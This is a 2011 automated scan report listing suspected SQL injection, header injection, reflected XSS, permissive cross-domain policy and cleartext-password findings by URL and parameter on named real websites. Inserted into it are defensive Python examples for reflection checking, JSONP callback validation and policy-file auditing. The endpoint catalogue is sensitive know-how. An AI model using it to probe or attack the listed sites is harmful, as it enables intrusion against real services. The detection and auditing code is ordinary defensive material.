XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07202011-01

Report generated by XSS.CX at Wed Jul 20 07:19:54 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search



1. SQL injection

1.1. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [dt parameter]

1.3. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]

1.4. http://googleads.g.doubleclick.net/pagead/ads [ifi parameter]

1.5. http://googleads.g.doubleclick.net/pagead/ads [xpc parameter]

2. HTTP header injection

2.1. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21 [REST URL parameter 1]

2.2. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.28 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.29 [REST URL parameter 1]

2.4. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.18 [REST URL parameter 1]

2.5. http://ad.doubleclick.net/adj/N553.AEAOLService/B4970757.33 [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5621931.6 [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adj/cm.bby.pcmcat203600050025/pcmcat203600050025 [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [REST URL parameter 1]

3. Cross-site scripting (reflected)

3.1. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [hcpage2 parameter]

3.2. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [ugc parameter]

3.3. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 1]

3.4. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 2]

3.5. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [callback parameter]

3.6. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [name of an arbitrarily supplied request parameter]

3.7. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [pageSize parameter]

3.8. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [show parameter]

3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

3.11. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.12. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.13. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.14. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.15. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.16. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.17. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.18. http://cgibin.erols.com/favicon.ico [REST URL parameter 1]

3.19. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 1]

3.20. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 2]

3.21. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 3]

3.22. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 4]

3.23. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [name of an arbitrarily supplied request parameter]

3.24. http://choices.truste.com/ca [c parameter]

3.25. http://choices.truste.com/ca [cid parameter]

3.26. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]

3.27. http://choices.truste.com/ca [plc parameter]

3.28. http://choices.truste.com/ca [zi parameter]

3.29. http://citi.bridgetrack.com/a/s/ [BT_PID parameter]

3.30. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]

3.31. http://feedinformer.com/search.php [src parameter]

3.32. http://feedinformer.com/search.php [uid parameter]

3.33. http://feedinformer.com/tg.php [uid parameter]

3.34. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.35. http://i2.services.social.microsoft.com/Search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.36. http://i4.services.social.microsoft.com/Search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

3.37. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpck parameter]

3.38. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpck parameter]

3.39. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpvc parameter]

3.40. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_300x250_A01.js [mpvc parameter]

3.41. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpck parameter]

3.42. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpck parameter]

3.43. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpvc parameter]

3.44. http://img.mediaplex.com/content/0/16228/131652/Lumension_IWL_728x90_A01.js [mpvc parameter]

3.45. http://jqueryui.com/themeroller/ [bgColorActive parameter]

3.46. http://jqueryui.com/themeroller/ [bgColorContent parameter]

3.47. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

3.48. http://jqueryui.com/themeroller/ [bgColorError parameter]

3.49. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

3.50. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

3.51. http://jqueryui.com/themeroller/ [bgColorHover parameter]

3.52. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

3.53. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

3.54. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

3.55. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

3.56. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

3.57. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

3.58. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

3.59. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

3.60. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

3.61. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

3.62. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

3.63. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

3.64. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

3.65. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

3.66. http://jqueryui.com/themeroller/ [bgTextureError parameter]

3.67. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

3.68. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

3.69. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

3.70. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

3.71. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

3.72. http://jqueryui.com/themeroller/ [borderColorActive parameter]

3.73. http://jqueryui.com/themeroller/ [borderColorContent parameter]

3.74. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

3.75. http://jqueryui.com/themeroller/ [borderColorError parameter]

3.76. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

3.77. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

3.78. http://jqueryui.com/themeroller/ [borderColorHover parameter]

3.79. http://jqueryui.com/themeroller/ [cornerRadius parameter]

3.80. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

3.81. http://jqueryui.com/themeroller/ [fcActive parameter]

3.82. http://jqueryui.com/themeroller/ [fcContent parameter]

3.83. http://jqueryui.com/themeroller/ [fcDefault parameter]

3.84. http://jqueryui.com/themeroller/ [fcError parameter]

3.85. http://jqueryui.com/themeroller/ [fcHeader parameter]

3.86. http://jqueryui.com/themeroller/ [fcHighlight parameter]

3.87. http://jqueryui.com/themeroller/ [fcHover parameter]

3.88. http://jqueryui.com/themeroller/ [ffDefault parameter]

3.89. http://jqueryui.com/themeroller/ [fsDefault parameter]

3.90. http://jqueryui.com/themeroller/ [fwDefault parameter]

3.91. http://jqueryui.com/themeroller/ [iconColorActive parameter]

3.92. http://jqueryui.com/themeroller/ [iconColorContent parameter]

3.93. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

3.94. http://jqueryui.com/themeroller/ [iconColorError parameter]

3.95. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

3.96. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

3.97. http://jqueryui.com/themeroller/ [iconColorHover parameter]

3.98. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.99. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

3.100. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

3.101. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

3.102. http://jqueryui.com/themeroller/ [opacityShadow parameter]

3.103. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

3.104. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorActive parameter]

3.105. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorContent parameter]

3.106. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorDefault parameter]

3.107. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHeader parameter]

3.108. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHighlight parameter]

3.109. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHover parameter]

3.110. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityActive parameter]

3.111. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityContent parameter]

3.112. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityDefault parameter]

3.113. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHeader parameter]

3.114. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityHover parameter]

3.115. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureActive parameter]

3.116. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureContent parameter]

3.117. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureDefault parameter]

3.118. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHeader parameter]

3.119. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgTextureHover parameter]

3.120. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorActive parameter]

3.121. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorContent parameter]

3.122. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorDefault parameter]

3.123. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHeader parameter]

3.124. http://jqueryui.com/themeroller/css/parseTheme.css.php [borderColorHover parameter]

3.125. http://jqueryui.com/themeroller/css/parseTheme.css.php [cornerRadius parameter]

3.126. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter]

3.127. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcActive parameter]

3.128. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcContent parameter]

3.129. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcDefault parameter]

3.130. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHeader parameter]

3.131. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHover parameter]

3.132. http://jqueryui.com/themeroller/css/parseTheme.css.php [ffDefault parameter]

3.133. http://jqueryui.com/themeroller/css/parseTheme.css.php [fsDefault parameter]

3.134. http://jqueryui.com/themeroller/css/parseTheme.css.php [fwDefault parameter]

3.135. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorActive parameter]

3.136. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorContent parameter]

3.137. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorDefault parameter]

3.138. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHeader parameter]

3.139. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHover parameter]

3.140. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter]

3.141. http://js.revsci.net/gateway/gw.js [csid parameter]

3.142. http://kona5.kontera.com/KonaGet.js [l parameter]

3.143. http://kona5.kontera.com/KonaGet.js [rId parameter]

3.144. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]

3.145. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]

3.146. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]

3.147. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]

3.148. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]

3.149. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]

3.150. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]

3.151. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]

3.152. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]

3.153. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]

3.154. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]

3.155. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]

3.156. http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter]

3.157. http://s49.sitemeter.com/js/counter.js [site parameter]

3.158. https://secure.domaintools.com/join/ [REST URL parameter 1]

3.159. https://secure.domaintools.com/join/ [REST URL parameter 1]

3.160. https://secure.domaintools.com/log-in/ [REST URL parameter 1]

3.161. https://secure.domaintools.com/log-in/ [REST URL parameter 1]

3.162. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]

3.163. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]

3.164. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard [mbox parameter]

3.165. http://whos.amung.us/psrvwidget/ [i parameter]

3.166. http://whos.amung.us/psrvwidget/ [k parameter]

3.167. http://lookupserver.com/ [User-Agent HTTP header]

3.168. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]

3.169. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]

3.170. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [Referer HTTP header]

3.171. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [Referer HTTP header]

3.172. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [Referer HTTP header]

3.173. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [Referer HTTP header]

3.174. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]

3.175. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [Referer HTTP header]

3.176. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [Referer HTTP header]

3.177. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [Referer HTTP header]

3.178. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [Referer HTTP header]

3.179. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]

3.180. http://s49.sitemeter.com/js/counter.js [IP cookie]

3.181. http://support.dnsstuff.com/ST.ashx [siteuidut cookie]
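The reflected-XSS entries above, including the "callback parameter" findings on the Best Buy Remix and DoubleVerify endpoints (3.5, 3.156), were produced by a crawler that submits a probe and looks for it in the response. The following Python is an added example (not code from XSS.CX or from any of the listed vendors) of the two checks behind that category: locating a bracketed probe in a response and deciding which metacharacters survived, and the strict identifier grammar that makes a JSONP callback parameter safe to echo. The marker token "xcx1", the sample response bodies and the content types are all constructed for the example.

```python
import re

# Marker that brackets the probe so the reflected slice can be located
# even when the server partially encodes it. "xcx1" is an arbitrary
# constructed token; any string unlikely to occur naturally will do.
MARKER = "xcx1"
META = "<>\"'"


def make_probe(marker: str = MARKER) -> str:
    """Probe value to submit in the parameter under test."""
    return f"{marker}{META}{marker}"


def surviving_metachars(body: str, marker: str = MARKER) -> set:
    """Return the set of probe metacharacters that came back unencoded.

    An empty set means the probe was either not reflected at all or was
    fully entity-encoded; in both cases there is nothing to exploit.
    """
    survivors = set()
    pattern = re.compile(re.escape(marker) + r"(.*?)" + re.escape(marker), re.S)
    for m in pattern.finditer(body):
        survivors |= set(m.group(1)) & set(META)
    return survivors


def assess(body: str, content_type: str, marker: str = MARKER) -> str:
    """Combine surviving metacharacters with the response type into a verdict.

    A quote surviving in a JavaScript response (a beacon.js-style
    endpoint) is as serious as an angle bracket surviving in HTML.
    """
    survivors = surviving_metachars(body, marker)
    if not survivors:
        return "not-reflected-or-encoded"
    ct = content_type.split(";")[0].strip().lower()
    js_types = {"application/javascript", "text/javascript", "application/x-javascript"}
    if ct == "text/html" and {"<", ">"} <= survivors:
        return "html-tag-injection"
    if ct in js_types and survivors & {'"', "'"}:
        return "js-string-breakout"
    if survivors & {'"', "'"}:
        return "quote-breakout"
    return "partial-reflection"


# JSONP callback names must be dotted JavaScript identifiers and nothing
# else; parentheses, quotes, angle brackets and slashes are all rejected.
_IDENT = r"[A-Za-z_$][A-Za-z0-9_$]*"
_CALLBACK_RE = re.compile(rf"{_IDENT}(?:\.{_IDENT})*")


def is_safe_jsonp_callback(name: str, max_len: int = 64) -> bool:
    """True only for callback names that cannot carry script into the response."""
    return 0 < len(name) <= max_len and _CALLBACK_RE.fullmatch(name) is not None


if __name__ == "__main__":
    # Constructed responses standing in for a search page and a tracking script.
    html_body = '<p>Results for xcx1<>"\'xcx1</p>'
    js_body = 'var c1 = "xcx1&lt;&gt;"\'xcx1";'
    print("probe:", make_probe())
    print(assess(html_body, "text/html; charset=utf-8"))
    print(assess(js_body, "application/javascript"))
    for cb in ("jQuery17101_1311160000000", "alert(1)", "a.b.c", "<script>"):
        print(cb, "->", is_safe_jsonp_callback(cb))
```

Rejecting a callback name is safer than encoding it: a JSONP endpoint must emit the name raw, so only a whitelist grammar removes the reflection. Serving the response as application/javascript with X-Content-Type-Options: nosniff additionally stops browsers from rendering the body as HTML when it is requested directly.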

4. Flash cross-domain policy

4.1. http://a.tribalfusion.com/crossdomain.xml

4.2. http://ad.afy11.net/crossdomain.xml

4.3. http://ad.turn.com/crossdomain.xml

4.4. http://ajax.googleapis.com/crossdomain.xml

4.5. http://amch.questionmarket.com/crossdomain.xml

4.6. http://api.facebook.com/crossdomain.xml

4.7. http://b.scorecardresearch.com/crossdomain.xml

4.8. http://b.voicefive.com/crossdomain.xml

4.9. http://bbc.112.2o7.net/crossdomain.xml

4.10. http://beacon.afy11.net/crossdomain.xml

4.11. http://bh.contextweb.com/crossdomain.xml

4.12. http://c.atdmt.com/crossdomain.xml

4.13. http://c.betrad.com/crossdomain.xml

4.14. http://c.live.com/crossdomain.xml

4.15. http://cdn.turn.com/crossdomain.xml

4.16. http://cdn5.tribalfusion.com/crossdomain.xml

4.17. http://citicorporate.d2.sc.omtrdc.net/crossdomain.xml

4.18. http://cms.quantserve.com/crossdomain.xml

4.19. http://dg.specificclick.net/crossdomain.xml

4.20. http://external.ak.fbcdn.net/crossdomain.xml

4.21. http://feed.domaintoolsblog.com/crossdomain.xml

4.22. http://fw.adsafeprotected.com/crossdomain.xml

4.23. http://g.live.com/crossdomain.xml

4.24. http://hits.informer.com/crossdomain.xml

4.25. http://i1.ytimg.com/crossdomain.xml

4.26. http://ib.adnxs.com/crossdomain.xml

4.27. http://in.getclicky.com/crossdomain.xml

4.28. http://int-t.pictela.net/crossdomain.xml

4.29. http://js.revsci.net/crossdomain.xml

4.30. http://l.betrad.com/crossdomain.xml

4.31. http://log30.doubleverify.com/crossdomain.xml

4.32. http://log50.doubleverify.com/crossdomain.xml

4.33. http://m.adnxs.com/crossdomain.xml

4.34. http://m.webtrends.com/crossdomain.xml

4.35. http://metrics.citibank.com/crossdomain.xml

4.36. http://p.brilig.com/crossdomain.xml

4.37. http://pix04.revsci.net/crossdomain.xml

4.38. http://r.turn.com/crossdomain.xml

4.39. http://r1-ads.ace.advertising.com/crossdomain.xml

4.40. http://sa.bbc.co.uk/crossdomain.xml

4.41. http://secure-us.imrworldwide.com/crossdomain.xml

4.42. http://segment-pixel.invitemedia.com/crossdomain.xml

4.43. http://spe.atdmt.com/crossdomain.xml

4.44. http://sync.adap.tv/crossdomain.xml

4.45. http://sync.mathtag.com/crossdomain.xml

4.46. http://t.mookie1.com/crossdomain.xml

4.47. http://tf.nexac.com/crossdomain.xml

4.48. http://turn.nexac.com/crossdomain.xml

4.49. http://whos.amung.us/crossdomain.xml

4.50. http://adadvisor.net/crossdomain.xml

4.51. https://adwords.google.com/crossdomain.xml

4.52. http://cbk0.google.com/crossdomain.xml

4.53. https://cbks0.google.com/crossdomain.xml

4.54. http://community.spiceworks.com/crossdomain.xml

4.55. http://feeds.bbci.co.uk/crossdomain.xml

4.56. http://googleads.g.doubleclick.net/crossdomain.xml

4.57. http://kws.kattack.com/crossdomain.xml

4.58. http://news.bbc.co.uk/crossdomain.xml

4.59. http://news.bbcimg.co.uk/crossdomain.xml

4.60. http://newsrss.bbc.co.uk/crossdomain.xml

4.61. http://pagead2.googlesyndication.com/crossdomain.xml

4.62. http://picasaweb.google.com/crossdomain.xml

4.63. http://rd.rlcdn.com/crossdomain.xml

4.64. http://s49.sitemeter.com/crossdomain.xml

4.65. http://te.kontera.com/crossdomain.xml

4.66. http://citi.bridgetrack.com/crossdomain.xml

4.67. http://docs.google.com/crossdomain.xml

4.68. http://khm0.google.com/crossdomain.xml

4.69. http://khm1.google.com/crossdomain.xml

4.70. http://mt0.google.com/crossdomain.xml

4.71. http://mt1.google.com/crossdomain.xml

4.72. http://mt2.google.com/crossdomain.xml

4.73. http://mt3.google.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.2. http://b.voicefive.com/clientaccesspolicy.xml

5.3. http://bbc.112.2o7.net/clientaccesspolicy.xml

5.4. http://c.atdmt.com/clientaccesspolicy.xml

5.5. http://c.live.com/clientaccesspolicy.xml

5.6. http://citicorporate.d2.sc.omtrdc.net/clientaccesspolicy.xml

5.7. http://metrics.citibank.com/clientaccesspolicy.xml

5.8. http://sa.bbc.co.uk/clientaccesspolicy.xml

5.9. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.10. http://spe.atdmt.com/clientaccesspolicy.xml

5.11. http://explore.live.com/clientaccesspolicy.xml
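Sections 4 and 5 list crossdomain.xml and clientaccesspolicy.xml files by URL only; the report does not reproduce their contents, so nothing here says which of them are permissive. What the scanner checks for is an allow-from rule that lets arbitrary origins read responses carrying the user's cookies. The checker below is an added example (not XSS.CX code, and not derived from any policy file named above) that parses both formats and flags the settings that matter; the three policy documents embedded in it are constructed for the example, and the severities are the author's own labels.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies; none was fetched from a host in the report.
WIDE_OPEN_FLASH = """<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

RESTRICTED_FLASH = """<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com"/>
</cross-domain-policy>"""

WIDE_OPEN_SILVERLIGHT = """<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""


def audit_crossdomain_xml(xml_text: str, served_over_https: bool = False) -> list:
    """Return (severity, detail) findings for a Flash cross-domain policy."""
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        raise ValueError("not a Flash cross-domain policy")
    for sc in root.iter("site-control"):
        if sc.get("permitted-cross-domain-policies") == "all":
            findings.append(("medium", "site-control=all: any file on the host may act as a policy"))
    for rule in root.iter("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append(("high", 'allow-access-from domain="*": any site can read responses with the user\'s cookies'))
        elif domain.startswith("*."):
            findings.append(("low", f"subdomain wildcard {domain}: every subdomain is trusted"))
        # Adobe defaults secure to true on https; secure="false" lets plain-http
        # content on the listed domain reach this https host.
        if served_over_https and rule.get("secure", "true").lower() == "false":
            findings.append(("medium", f'secure="false" on {domain} downgrades the https policy'))
    for hdr in root.iter("allow-http-request-headers-from"):
        if hdr.get("domain") == "*" and hdr.get("headers") == "*":
            findings.append(("medium", "any origin may send arbitrary request headers"))
    return findings


def audit_clientaccesspolicy_xml(xml_text: str) -> list:
    """Return (severity, detail) findings for a Silverlight access policy."""
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "access-policy":
        raise ValueError("not a Silverlight client access policy")
    for allow in root.iter("allow-from"):
        if allow.get("http-request-headers") == "*":
            findings.append(("medium", "allow-from permits arbitrary request headers"))
        for dom in allow.iter("domain"):
            uri = dom.get("uri", "")
            if uri in ("*", "http://*", "https://*"):
                findings.append(("high", f'domain uri="{uri}": any site can read responses with the user\'s cookies'))
            elif "*" in uri:
                findings.append(("low", f"wildcard origin {uri}"))
    return findings


if __name__ == "__main__":
    for label, fn, doc in (
        ("flash/open", audit_crossdomain_xml, WIDE_OPEN_FLASH),
        ("flash/restricted", audit_crossdomain_xml, RESTRICTED_FLASH),
        ("silverlight/open", audit_clientaccesspolicy_xml, WIDE_OPEN_SILVERLIGHT),
    ):
        print(label, fn(doc) or "clean")
```

A wildcard is harmless on a host that serves only public, cookie-free content (a CDN or a pixel server), which is why several entries in section 4 may be accepted risk; the same wildcard on a host that also serves authenticated pages lets any site with a Flash or Silverlight object read those pages as the victim. The audit therefore has to be paired with a judgment about what else the host serves.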

6. Cleartext submission of password

6.1. http://67.228.151.70:81/user_session/new

6.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

6.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

6.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

6.5. http://cache.vzw.com/globalnav/globalnav.js

6.6. http://gmf-aeroasia.co.id/

6.7. http://gmf-aeroasia.co.id/WorldClient.dll

6.8. http://support.dnsstuff.com/Login.aspx

7. XML injection

7.1. http://mt0.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.2. http://mt0.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.3. http://mt1.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.4. http://mt1.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.5. http://mt2.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.6. http://mt2.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.7. http://mt3.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7.8. http://mt3.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

8. Session token in URL

8.1. http://simplexityllc.tt.omtrdc.net/m2/simplexityllc/mbox/standard

8.2. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

9. Password field submitted using GET method

9.1. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

9.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

9.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

10. Cookie scoped to parent domain

10.1. http://blog.domaintools.com/

10.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

10.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

10.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

10.5. http://c.microsoft.com/trans_pixel.aspx

10.6. http://cts-log.channelintelligence.com/

10.7. http://t.mookie1.com/t/v1/imp

10.8. http://t.mookie1.com/t/v1/imp/cc

10.9. http://a.tribalfusion.com/i.ad

10.10. http://a.tribalfusion.com/j.ad

10.11. http://ad.afy11.net/ad

10.12. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21

10.13. http://ad.doubleclick.net/adj/N553.AEAOLService/B4970757.33

